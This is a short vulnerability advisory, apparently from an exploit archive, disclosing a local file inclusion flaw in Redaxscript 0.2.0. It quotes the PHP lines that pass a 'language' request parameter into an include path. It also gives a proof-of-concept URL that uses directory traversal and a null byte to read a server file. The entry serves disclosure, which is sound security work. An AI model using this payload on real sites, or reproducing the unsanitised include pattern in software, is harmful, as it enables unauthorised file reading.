id: 5019
date: 04/09/2009
title: Redaxscript 0.2.0 (language) Local File Inclusion Vulnerability
author: SirGod
cves: 

===============================================================
Redaxscript 0.2.0 (language) Local File Inclusion Vulnerability
===============================================================

##################################################################################
[+] Redaxscript 0.2.0 (index.php language) Local File Inclusion Vulnerability
##################################################################################

[+] Local File Inclusion

  index.php :

-----------------------------------------------------------------
include('template/'.$_SESSION[_root.'template'].'/index.php');
-----------------------------------------------------------------

  function.php :

-----------------------------------------------------------------
if($_GET['language']) {
		$_SESSION[_root.'language'] = $_GET['language'];
-----------------------------------------------------------------

 - PoC :

    http://127.0.0.1/index.php?language=../../../../../BOOTSECT.BAK%00

##################################################################################



#  0day.today [2023-03-27]  #